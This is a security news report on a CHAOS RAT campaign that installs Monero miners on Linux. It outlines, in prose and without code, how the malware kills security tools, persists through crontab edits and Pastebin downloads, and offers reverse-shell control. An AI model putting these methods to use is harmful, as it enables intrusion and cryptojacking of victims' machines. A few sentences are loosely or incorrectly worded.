Using Go-based CHAOS malware in a cryptocurrency mining campaign, a new threat actor has been spotted in the wild. According to Trend Micro, the threat campaign targets Linux users and has been working undercover since November 2022.
The campaigns begin with a simple infection. Later, the malware is used to target the victim’s computer and its resources — mainly security programs on the victim’s devices, and lastly, installing a cryptocurrency miner called the Monero (XMR).
Crypto Mining Campaigns
Upon further investigation, it was found that the malware maintains persistence by modifying the /etc/crontab file and downloading itself every 10 minutes from Pastebin.
The researchers did an exclusive report about the campaign last month. It denoted that the procedure of competing for malware, such as Kinsing, and eliminating resources that influence cryptocurrency mining performance, has not changed.
The initial phase saw attackers trying to kill off competing malware, security products, and other cloud middleware. Routines followed this for persistence and payload execution, which in most cases is a Monero (XMR) cryptocurrency miner,” read the report.
Moreover, the primary downloader script and other payloads used in the attacks were protected at all times by hosting them at different locations.
This method ensured that the campaign remained active in case any of its targets found the payload and broke the connection.
According to the researchers, the campaigns’ central server was based in Russia and was used for hosting, wherein the C2 server was used to deliver the payloads onto the victim’s devices.
Moreover, the Chaos RAT connected to another C&C server, most likely in Hong Kong. Once the payload is installed, and the RAT is launched, it connects to the C2 server using its address and default port, with the authorization granted by a JSON Web Token (JTW).
Using the command /device, the malware sends precise information about the infected machine to the C2 server. The Go-based RAT supports functions like downloading files, uploading files, taking screenshots, performing reverse shell, accessing file explorer, opening URLs on the victim’s devices, and control power options.